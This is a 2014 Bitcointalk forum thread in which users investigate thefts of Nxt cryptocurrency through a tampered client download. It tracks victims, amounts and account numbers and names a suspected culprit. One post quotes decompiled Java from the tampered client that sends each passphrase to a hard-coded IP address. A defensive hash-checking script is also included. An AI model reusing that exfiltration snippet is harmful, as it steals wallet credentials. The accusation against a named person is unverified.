plasticAiredale
|
|
January 02, 2014, 01:36:13 PM |
|
Let's keep the historical record straight here. sparta_cuss reported this before PaulyC, and sparta_cuss was immediately blown off by CfB:
Quote from: sparta_cuss on January 01, 2014, 04:05:58 PM
Hey, looks like I just got robbed, too. Someone please check this account: 12152013998194592943 They now have 147k+ from me. Had a 40 char random password, capital, lower, numbers, symbols. WTF?
Quote from CfB:
Can u prove that ur coins were stolen? My account passphrase < 40 chars and contains 2M, why did the thief choose ur account instead of mine? Sorry, but ur case looks more like black PR attempt.
There's a clear pattern if you look at all the data:
| Time | Victim | Vic Account | Thief Account | NXT |
|---|---|---|---|---|
| 01.01.2014 12:56:54 | plasticAiredale | 8439060069775407509 | 15182566201738727933 | 18665 |
| 01.01.2014 12:58:03 | PaulyC | 16821029889165561706 | 16204974692852323982 | 7808 |
| 01.01.2014 13:01:45 | newcn | 16886318053889080545 | 9793828175536096502 | 18197 |
| 01.01.2014 13:05:06 | sparta_cuss | 11794318797680953099 | 12152013998194592943 | 147690 |

Somebody is manually stealing data at 3-4 minute intervals and Sparta_cuss was by far the most wronged. We should check the blocks/transactions/accounts before and after this time period.

Don't forget Framewood, too. Please notice the date and how little the community paid attention.
https://bitcointalk.org/index.php?topic=345619.msg4172532#msg4172532
This bears repeating: Please notice the date and how little the community paid attention.
Yeah unfortunately at the time it was a one-time thing, made by a Jr. Member so everybody probably just figured it was user error, plus he didn't raise much of a stink after. Doesn't justify it, but probably explains it.
Currently it looks like EpicThomas only was able to get a few accounts. Hopefully now people will be more vigilant with downloading new clients. But if there is no official client, or at least one endorsed by CFB, how do we even know if the posted hash is the one for the client that isn't hacked? Who else can we trust?
|
|
|
|
Buratino
Legendary
Offline
Activity: 1151
Merit: 1003
|
|
January 02, 2014, 01:39:04 PM |
|
Is it possible to provide a self-test (like ECC) mechanism for safety code in the Nxt client to prevent thefts in the future?
|
|
|
|
salsacz
|
|
January 02, 2014, 01:39:43 PM |
|
...
please add big warning not to use downloading link from the cache. And congrats - now we have all clues.
|
|
|
|
LiQio
Legendary
Offline
Activity: 1181
Merit: 1002
|
|
January 02, 2014, 01:42:16 PM |
|
...
please add big warning not to use downloading link from the cache. And congrats - now we have all clues.
Done
|
|
|
|
plasticAiredale
|
|
January 02, 2014, 01:44:30 PM |
|
...
please add big warning not to use downloading link from the cache. And congrats - now we have all clues.
Done
I modified my posts as well. Good thinking.
|
|
|
|
utopianfuture
Sr. Member
Offline
Activity: 602
Merit: 268
Internet of Value
|
|
January 02, 2014, 01:45:08 PM |
|
Let's keep the historical record straight here. sparta_cuss reported this before PaulyC, and sparta_cuss was immediately blown off by CfB:
Quote from: sparta_cuss on January 01, 2014, 04:05:58 PM
Hey, looks like I just got robbed, too. Someone please check this account: 12152013998194592943 They now have 147k+ from me. Had a 40 char random password, capital, lower, numbers, symbols. WTF?
Don't forget Framewood, too. Please notice the date and how little the community paid attention.
https://bitcointalk.org/index.php?topic=345619.msg4172532#msg4172532
This bears repeating: Please notice the date and how little the community paid attention.
Yeah unfortunately at the time it was a one-time thing, made by a Jr. Member so everybody probably just figured it was user error, plus he didn't raise much of a stink after. Doesn't justify it, but probably explains it.
Currently it looks like EpicThomas only was able to get a few accounts. Hopefully now people will be more vigilant with downloading new clients. But if there is no official client, or at least one endorsed by CFB, how do we even know if the posted hash is the one for the client that isn't hacked? Who else can we trust?
We have three groups of core developers: BCNext, CfB and Luc. Luc will release new clients from now on. He just posted the 0.4.9 client and I am running it right now.
|
|
|
|
landomata
Legendary
Offline
Activity: 2184
Merit: 1000
|
|
January 02, 2014, 01:45:32 PM |
|
WHO IS PUNKROCK? This kind of link matches EPICTHOMAS Pattern! We need multiple checks on this.
|
|
|
|
Damelon
Legendary
Offline
Activity: 1092
Merit: 1010
|
|
January 02, 2014, 01:45:35 PM |
|
I just checked the nxt$Crypto.class that I downloaded yesterday via the instructions for linux, and I get this. It doesn't match at all with what is reported should be in there, but is also different from the "modified" file posted yesterday. Can someone explain if I need to freak out or not?
Code:
import java.security.MessageDigest;
import java.util.Arrays;

class Nxt$Crypto {
    static byte[] getPublicKey(String paramString) {
        try {
            byte[] arrayOfByte = new byte[32];
            Nxt.Curve25519.keygen(arrayOfByte, null, MessageDigest.getInstance("SHA-256").digest(paramString.getBytes("UTF-8")));
            return arrayOfByte;
        } catch (Exception localException) {}
        return null;
    }

    static byte[] sign(byte[] paramArrayOfByte, String paramString) {
        try {
            byte[] arrayOfByte1 = new byte[32];
            byte[] arrayOfByte2 = new byte[32];
            MessageDigest localMessageDigest = MessageDigest.getInstance("SHA-256");
            Nxt.Curve25519.keygen(arrayOfByte1, arrayOfByte2, localMessageDigest.digest(paramString.getBytes("UTF-8")));
            byte[] arrayOfByte3 = localMessageDigest.digest(paramArrayOfByte);
            localMessageDigest.update(arrayOfByte3);
            byte[] arrayOfByte4 = localMessageDigest.digest(arrayOfByte2);
            byte[] arrayOfByte5 = new byte[32];
            Nxt.Curve25519.keygen(arrayOfByte5, null, arrayOfByte4);
            localMessageDigest.update(arrayOfByte3);
            byte[] arrayOfByte6 = localMessageDigest.digest(arrayOfByte5);
            byte[] arrayOfByte7 = new byte[32];
            Nxt.Curve25519.sign(arrayOfByte7, arrayOfByte6, arrayOfByte4, arrayOfByte2);
            byte[] arrayOfByte8 = new byte[64];
            System.arraycopy(arrayOfByte7, 0, arrayOfByte8, 0, 32);
            System.arraycopy(arrayOfByte6, 0, arrayOfByte8, 32, 32);
            return arrayOfByte8;
        } catch (Exception localException) {}
        return null;
    }

    static boolean verify(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, byte[] paramArrayOfByte3) {
        try {
            byte[] arrayOfByte1 = new byte[32];
            byte[] arrayOfByte2 = new byte[32];
            System.arraycopy(paramArrayOfByte1, 0, arrayOfByte2, 0, 32);
            byte[] arrayOfByte3 = new byte[32];
            System.arraycopy(paramArrayOfByte1, 32, arrayOfByte3, 0, 32);
            Nxt.Curve25519.verify(arrayOfByte1, arrayOfByte2, arrayOfByte3, paramArrayOfByte3);
            MessageDigest localMessageDigest = MessageDigest.getInstance("SHA-256");
            byte[] arrayOfByte4 = localMessageDigest.digest(paramArrayOfByte2);
            localMessageDigest.update(arrayOfByte4);
            byte[] arrayOfByte5 = localMessageDigest.digest(arrayOfByte1);
            return Arrays.equals(arrayOfByte3, arrayOfByte5);
        } catch (Exception localException) {}
        return false;
    }
}
|
|
|
|
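The posts above ask how to trust a posted hash and whether one downloaded class file differs from the expected one. The following is an added example, not code from this thread or from the Nxt project: it checks a whole download against a published SHA-256 and then hashes every entry in the archive to show which files differ from a trusted copy. The archive contents, entry names and the published value are constructed stand-ins.

```python
import hashlib
import hmac
import io
import zipfile


def archive_matches(archive_bytes, published_sha256):
    """True if the whole download hashes to the published SHA-256 value."""
    actual = hashlib.sha256(archive_bytes).hexdigest()
    return hmac.compare_digest(actual, published_sha256.strip().lower())


def entry_digests(archive_bytes):
    """Map every file inside a zip/jar to the SHA-256 of its contents."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return {i.filename: hashlib.sha256(zf.read(i)).hexdigest()
                for i in zf.infolist() if not i.is_dir()}


def diff_archives(reference_bytes, suspect_bytes):
    """Entries modified, added or removed relative to the trusted reference."""
    ref, sus = entry_digests(reference_bytes), entry_digests(suspect_bytes)
    return {
        "modified": sorted(n for n in ref.keys() & sus.keys() if ref[n] != sus[n]),
        "added": sorted(sus.keys() - ref.keys()),
        "removed": sorted(ref.keys() - sus.keys()),
    }


def build_zip(files):
    """Helper for the constructed samples below: pack {name: bytes} into a zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample data: stand-ins for a trusted build and a tampered download.
REFERENCE = build_zip({"Nxt.class": b"main v1", "Nxt$Crypto.class": b"crypto v1"})
SUSPECT = build_zip({"Nxt.class": b"main v1", "Nxt$Crypto.class": b"crypto v1 + extra code"})
PUBLISHED = hashlib.sha256(REFERENCE).hexdigest()  # value a trusted party would post

if __name__ == "__main__":
    print("reference ok:", archive_matches(REFERENCE, PUBLISHED))
    print("suspect ok:  ", archive_matches(SUSPECT, PUBLISHED))
    print(diff_archives(REFERENCE, SUSPECT))
```

The whole-archive check only says that something changed; the per-entry diff narrows it to the class that needs decompiling and review. Both checks are only as trustworthy as the channel the reference hash or reference archive came through.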
rlh
|
|
January 02, 2014, 01:45:58 PM |
|
Sorry if I'm the 1 millionth person to ask but... source?
|
A Personal Quote on BTT from 2011: "I'd be willing to make a moderate "investment" if the value of the BTC went below $2.00. Otherwise I'll just have to live with my 5 BTC and be happy. :/" ...sigh. If only I knew.
|
|
|
bidji29
|
|
January 02, 2014, 01:48:33 PM |
|
Sorry if I'm the 1 millionth person to ask but... source?
Tomorrow
|
|
|
|
rlh
|
|
January 02, 2014, 01:50:17 PM |
|
Sorry if I'm the 1 millionth person to ask but... source?
Tomorrow
Ah, I see now. I didn't realize it was pushed back a day. Thank you.
|
|
|
salsacz
|
|
January 02, 2014, 01:50:46 PM |
|
Punkrock is a German mod who was releasing posts about new versions of the clients. He also changed the downloading link from Drexme's post. But all punkrock's links were OK, they lead to the right MEGA links.
|
|
|
|
landomata
Legendary
Offline
Activity: 2184
Merit: 1000
|
|
January 02, 2014, 01:51:12 PM |
|
Sorry if I'm the 1 millionth person to ask but... source?
Tomorrow
Ah, I see now. I didn't realize it was pushed back a day. Thank you.
It was always set for the 3rd of Jan
|
|
|
|
utopianfuture
Sr. Member
Offline
Activity: 602
Merit: 268
Internet of Value
|
|
January 02, 2014, 01:52:17 PM |
|
Sorry if I'm the 1 millionth person to ask but... source?
Tomorrow
Ah, I see now. I didn't realize it was pushed back a day. Thank you.
Nah, it was not pushed back. It was always intended to be released on Bitcoin's 5th birthday, January 3.
|
|
|
|
rickyjames
|
|
January 02, 2014, 01:55:30 PM Last edit: January 02, 2014, 02:20:25 PM by rickyjames |
|
OK, a summary of what we know so far:

The smoking gun points to EpicThomas, and kudos to LiQio for finding the smoking gun. Go to the Google cache page LiQio found below, then hover your mouse over the link where EpicThomas says "NRS 0.4.8 is ready and can be downloaded from: http://info.nxtcrypto.org/nxt-client-0.4.8.zip". The mouseover link that appears goes to http://162.243.246.233/nxt-client-0.4.8.zip even tho the blue text of the link says http://info.nxtcrypto.org/nxt-client-0.4.8.zip.

http://webcache.googleusercontent.com/search?q=cache:x1fHlORdUIEJ:https://bitcointalk.org/index.php%3Ftopic%3D345619.11820+&cd=1&hl=de&ct=clnk&gl=de

EpicThomas made his original post which contained the bad link at 31.12.2013 13:23:22 and then later edited his post and CHANGED IT BACK to the correct client.

The 0.4.8 losses were first reported by Sparta_cuss (147K NXT), then PaulyC (8K), then newcn (18K), then plasticAiredale (19K).

The 0.4.8 losses we do know of came in an 8 minute window:

| Time | Victim | Vic Account | Thief Account | NXT |
|---|---|---|---|---|
| 01.01.2014 12:56:54 | plasticAiredale | 8439060069775407509 | 15182566201738727933 | 18665 |
| 01.01.2014 12:58:03 | PaulyC | 16821029889165561706 | 16204974692852323982 | 7808 |
| 01.01.2014 13:01:45 | newcn | 16886318053889080545 | 9793828175536096502 | 18197 |
| 01.01.2014 13:05:06 | sparta_cuss | 11794318797680953099 | 12152013998194592943 | 147690 |

There may well be more 0.4.8 losses that haven't been discovered or reported yet.

There may have been losses from earlier clients before 0.4.8, as first reported by Framewood on December 27, 2013, 06:26:16 PM. See: https://bitcointalk.org/index.php?topic=345619.msg4172532#msg4172532 . If so, here is the first reported loss:

| Time | Victim | Vic Account | Thief Account | NXT |
|---|---|---|---|---|
| 26.12.2013 17:09:30 | Framewood | 697109629372813510 | 13643712185318669838 | 100088 |

Total reported losses so far are 292,448 NXT worth around 28 BTC or over $23,000.

There's got to be more. Keep digging.
|
|
|
|
pinarello
Full Member
Offline
Activity: 266
Merit: 100
NXT is the future
|
|
January 02, 2014, 01:56:39 PM |
|
Is 17480583094667840121 your new account?
That is not my account.
Sorry that was directed to PaulyC.
Hey sorry just saw this. That's very generous! thanks Gbeirn. I don't even know when I'll check if it's in there, I'm freaked until the *confirmed client.. hah Yes this account hasn't been compromised and has a strong 40+ random PW, I haven't used it since 4.7e!
Edit** Decided as everyone should to start fresh new Acct# with the windows installer from Pg. 1. Check sum'd and Hash good. thanks to anyone who can contribute. NXT 14008664550450326382 I did get a pm from another poster who mentioned setting up a bounty for me, so I don't know what the protocol is here, sorry. thanks!
So you confirm that windows installer from page 1 is ok?
Pin
|
|
|
|
Damelon
Legendary
Offline
Activity: 1092
Merit: 1010
|
|
January 02, 2014, 02:00:21 PM |
|
No problem I would also be interested if with the advent of the asset exchange it would be possible to move all my 1350+ aliases to a new account. Took me quite a while to get them and I would HATE to lose them!
|
|
|
|
utopianfuture
Sr. Member
Offline
Activity: 602
Merit: 268
Internet of Value
|
|
January 02, 2014, 02:01:59 PM |
|
OK, a summary of what we know so far:

The smoking gun points to EpicThomas, and kudos to LiQio for finding the smoking gun. Go to the Google cache page LiQio found below, then hover your mouse over the link where EpicThomas says "NRS 0.4.8 is ready and can be downloaded from: http://info.nxtcrypto.org/nxt-client-0.4.8.zip". The mouseover link that appears goes to http://162.243.246.233/nxt-client-0.4.8.zip even tho the blue text of the link says http://info.nxtcrypto.org/nxt-client-0.4.8.zip.

http://webcache.googleusercontent.com/search?q=cache:x1fHlORdUIEJ:https://bitcointalk.org/index.php%3Ftopic%3D345619.11820+&cd=1&hl=de&ct=clnk&gl=de

EpicThomas then later edited his post and CHANGED IT BACK to the correct client.

The 0.4.8 losses were first reported by Sparta_cuss (147K NXT), then PaulyC (8K), then newcn (18K), then plasticAiredale (19K).

The 0.4.8 losses we do know of came in an 8 minute window:

| Time | Victim | Vic Account | Thief Account | NXT |
|---|---|---|---|---|
| 01.01.2014 12:56:54 | plasticAiredale | 8439060069775407509 | 15182566201738727933 | 18665 |
| 01.01.2014 12:58:03 | PaulyC | 16821029889165561706 | 16204974692852323982 | 7808 |
| 01.01.2014 13:01:45 | newcn | 16886318053889080545 | 9793828175536096502 | 18197 |
| 01.01.2014 13:05:06 | sparta_cuss | 11794318797680953099 | 12152013998194592943 | 147690 |

There may well be more 0.4.8 losses that haven't been discovered or reported yet.

There may have been losses from earlier clients before 0.4.8, as first reported by Framewood on December 27, 2013, 06:26:16 PM. If so, here is the first reported loss:

| Time | Victim | Vic Account | Thief Account | NXT |
|---|---|---|---|---|
| 26.12.2013 17:09:30 | Framewood | 697109629372813510 | 13643712185318669838 | 100088 |

Total reported losses so far are 292,448 NXT worth around 28 BTC or over $23,000.

There's got to be more. Keep digging.

More evidence. The ip address where the bogus client was stored belongs to EpicThomas, the same as epicdices.com

Quote from: notsoshifty on Today at 01:46:08 AM
Quote from: notsoshifty on Today at 01:38:41 AM
Interesting...:
Code:
if (!paramString.equals("")) {
    if (!myKeys.contains(paramString)) {
        URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
        URLConnection connection = url.openConnection();
        connection.setConnectTimeout(10000);
        connection.getInputStream();
        myKeys.add(paramString);
    }
}
epicdices.com is also hosted on 162.243.246.223 - coincidence?

no, as I wrote here, we know identity of the hacker:
162.243.246.223 looks like it is "epicdices.com" (http://domain-kb.com/www/epicdices.com)
Owner of epicdices - EpicThomas - is a member of this topic: https://bitcointalk.org/index.php?action=profile;u=172850;sa=showPosts
|
|
|
|
bahamapascal
|
|
January 02, 2014, 02:02:06 PM |
|
C-f-B, or any other dev here, could you review this Idea? And let us know your opinion, I am not a coder so maybe my Idea is not possible from a technical point of view.
It's the multisig feature that is scheduled for a later date.
LOL, so I just reinvented the wheel. Never knew multisig was meant to be used for 2fa, cool
|
|
|
|
mnightwaffle
|
|
January 02, 2014, 02:03:05 PM |
|
So you confirm that windows installer from page 1 is ok?
Pin
yes, the above checks out
Not 100% sure about the self-installing client
|
|
|
|
|